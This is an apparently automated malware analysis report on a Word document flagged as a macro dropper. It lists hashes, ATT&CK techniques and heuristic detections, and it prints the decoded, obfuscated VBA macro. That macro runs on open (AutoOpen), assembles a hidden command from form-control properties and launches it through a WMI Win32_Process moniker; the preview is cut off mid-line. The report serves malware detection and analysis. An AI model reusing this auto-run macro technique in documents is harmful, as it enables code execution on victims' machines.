Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e54e3244fd282e24…

MALICIOUS

Office (OLE)

Size: 139.1 KB
Created: 2019-05-08 17:36:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 7c48919dc8b0d047989dfe3dd45476ab
SHA-1: 088bf473ff412947dfc287b3a219bcfa58e67a31
SHA-256: e54e3244fd282e2498df9cd1a6e23981bd858cd178665263b6eeff3edb6cba82
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes GetObject and CreateObject to launch a WMI process, indicating an attempt to execute arbitrary commands or download further payloads. The ClamAV detection 'Doc.Dropper.Agent-6965774-0' further supports its malicious nature as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6965774-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6965774-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6850 bytes
SHA-256: cb10093ac6f0739d22565c71f619174ba982a01e43294f7cf8cd03d45a4c336f

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "u266359_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "o527_216"
Attribute VB_Base = "0{E89BDF6C-CDF9-44B3-BD78-6D56238EDB36}{FC61C88D-9A4A-4EF7-8F47-76F8210231CE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "v82049"

Attribute VB_Name = "d8260569"

Attribute VB_Name = "X_03_27"

Attribute VB_Name = "A4590489"

Attribute VB_Name = "S9473908"
Attribute VB_Base = "0{63AF6905-F3A3-438D-AF8E-870DC54746BD}{AA920780-647F-4A27-A65D-137B92DB7800}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "N25165"
Function E723134(K1071967)
         While U12808__ And O20757
'f527_070o731565M1112848z9380149
'P11_52O853203_C07282d_4_2972
'w28_76O87450k_6250i2647881
      Wend
         While k043491 And z14204
'G76403M74__42S097236U0103233
'd298481Z27_9665A4_1193T38887_
'M6_1299w3588388E902288V_401_26
      Wend
Set E723134 = CVar(K1071967)
         While U34068 And I7_31652
'm513901A8_211_z178083n2__6779
'J55973M60314X9164_Q95135
's_1363L6_4_71S29888W699810
      Wend
         While Z9656_95 And i69512
'a0571812P656120X62755K4801345
'v895542o25762_R3_36_w9342198
'V12965j9839241X83067s1818_
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While z4527138 And S13571
'V870228r6622618V994915A476963
'C23674H03739z885009z54_87
'q7_4_250a0196219E435258M53585
      Wend
         While k9161891 And q7865_
'u463631l__8477r3378_82p6745235
'R952312a_2062O77742A27671
'L71925C0708823z980183_b2959070
      Wend
Call k566251
         While U8_273 And s992217
'L84922_1X600_0O5662_m020_59
's3537124C1_93114l649741L190227
'l55322_6u90177w783_30O3977347
      Wend
         While S775548 And P57178_2
'h4828_08w4116549W0830964Q377348
'Y68259_4J531659L_57__6Y0299073
'M605_872E35843w82__3W5745371
      Wend
         While u19558 And Y3880_46
'z104656Z447930s3763760z_993002
'b508477u511677t307189Y2802744
'w281435w4381441Q30_011_X832405
      Wend
End Sub


Attribute VB_Name = "U830644"
Function k566251()
On Error Resume Next
         While L385225 And Q5076977
'q5661119j516643i64_61k13732
'F8884148t45126O366160n60543
'h7_0728I00809s8577306J007207
      Wend
         While j987061 And O391_773
'I4979_z734759L6_62062E360102
't2_761V_74339U8_63696V93566
'j4065152F01964w788222f3620742
      Wend
         While J965_593 And Y_823_8
'b39991V25203T22561W46_3_7
'Q185_85T27678s0718682Y906668
'z95581Y2_80931U77_473X071915
      Wend
E166256 = o527_216.c232_28.ControlTipText + S9473908.A9_04_3 + o527_216.c232_28.ControlSource + S9473908.o454584 + o527_216.c232_28.PasswordChar + o527_216.c232_28.PasswordChar + S9473908.C_17318_ + o527_216.c232_28.ControlTipText + o527_216.c232_28 + S9473908.G_838386 + o527_216.c232_28 + S9473908.N674__ + o527_216.c232_28.ControlSource
         While u__197 And f37805
'n2121_f96_706h1316_38Q6532487
'E3_346_b9900351J06835d47_46
'V1181120d8719354j789335d53719
      Wend
         While G60_5_ And J37048
't3170600C98773_3M055_425h463_09
'i8_76_d84_141u88745N9358950
'H330660z77_670_l445832t00128
      Wend
Set j589625 = E723134(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
         While X65_58 And I3_2702
'z_4839O1018475C615955T867438
'Y5396128Z_58832b30403p569_4
'Z54__419f1_943_7j257_043a889309
      Wend
         While p13_2469 And M167920
'q77976l9426988c2411_4q727336
'N48557K69390R6_9675w17210
'V62928z905319v9609804d202701
      Wend
j589625.Create v39456 + E166256 + z904_32, V794583,
... (truncated)